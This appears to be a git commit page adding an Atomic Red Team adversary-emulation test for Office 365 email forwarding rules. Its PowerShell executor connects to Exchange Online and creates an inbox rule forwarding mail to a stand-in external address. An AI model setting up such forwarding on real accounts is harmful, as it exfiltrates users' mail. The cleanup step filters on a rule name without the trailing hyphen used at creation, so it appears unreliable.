security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Create T1114.003.yaml

Browse Source
This commit is contained in:
Justin Schoenfeld
2023-01-04 16:25:29 -05:00
parent eeefbccf77
commit ef832dc7aa
1 changed files with 46 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1114.003/T1114.003.yaml
+46
View File
@@ -0,0 +1,46 @@
attack_technique: T1114.003
display_name: 'Email Collection: Email Forwarding Rule'
atomic_tests:
- name: Office365 - Email Forwarding
auto_generated_guid:
description: |
Creates a new Inbox Rule to forward emails to an external user via the "ForwardTo" property of the New-InboxRule Powershell cmdlet.
supported_platforms:
- office-365
input_arguments:
username:
description: office-365 username
type: String
default: null
password:
description: office-365 password
type: String
default: null
rule_name:
description: email rule name
type: String
default: "Atomic Red Team Email Rule"
dependency_executor_name: powershell
dependencies:
- description: |
ExchangeOnlineManagement PowerShell module must be installed. Your user must also have an Exchange license.
prereq_command: |
$RequiredModule = Get-Module -Name ExchangeOnlineManagement -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Connect-ExchangeOnline']) {exit 1} else {exit 0}
get_prereq_command: |
Install-Module -Name ExchangeOnlineManagement
Import-Module ExchangeOnlineManagement
executor:
command: |
$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
Connect-ExchangeOnline -Credential $creds
New-InboxRule -Name "#{rule_name}-" -ForwardTo 'Atomic_Operator@example.com'
cleanup_command: |
$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
Connect-ExchangeOnline -Credential $creds
Get-InboxRule | Where-Object { $_.Name -eq 'Atomic Red Team Email Rule' } | ForEach-Object { Remove-InboxRule -Identity $_.Identity -Force -Confirm:$False }
name: powershell
elevation_required: false